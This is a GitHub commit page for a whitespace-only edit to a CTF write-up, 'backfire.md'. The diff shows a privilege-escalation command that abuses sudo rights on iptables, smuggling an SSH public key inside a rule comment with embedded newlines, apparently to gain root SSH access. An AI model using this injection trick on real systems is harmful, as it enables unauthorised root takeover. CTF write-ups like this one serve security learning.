Skip to content

Commit

Permalink
whitespace
Browse files Browse the repository at this point in the history
  • Loading branch information
farukerdem34 committed Jan 19, 2025
1 parent 4e6680e commit bfb9090
Showing 1 changed file with 2 additions and 3 deletions.
5 changes: 2 additions & 3 deletions content/CTF Write-Ups/backfire.md
Original file line number Diff line number Diff line change
Expand Up @@ -392,9 +392,8 @@ ssh [email protected]
ssh-keygen -t ed25519 -C "user@ubuntu"
```

```
sudo -u root /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOD4AOKmqCL2DRPY5+2h276o0EHsp0TjpcV47Pa6LvIo kali@kali
user@ubuntu\n'
```bash
sudo -u root /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOD4AOKmqCL2DRPY5+2h276o0EHsp0TjpcV47Pa6LvIo kali@kali user@ubuntu\n'
```

```bash
Expand Down

0 comments on commit bfb9090

Please sign in to comment.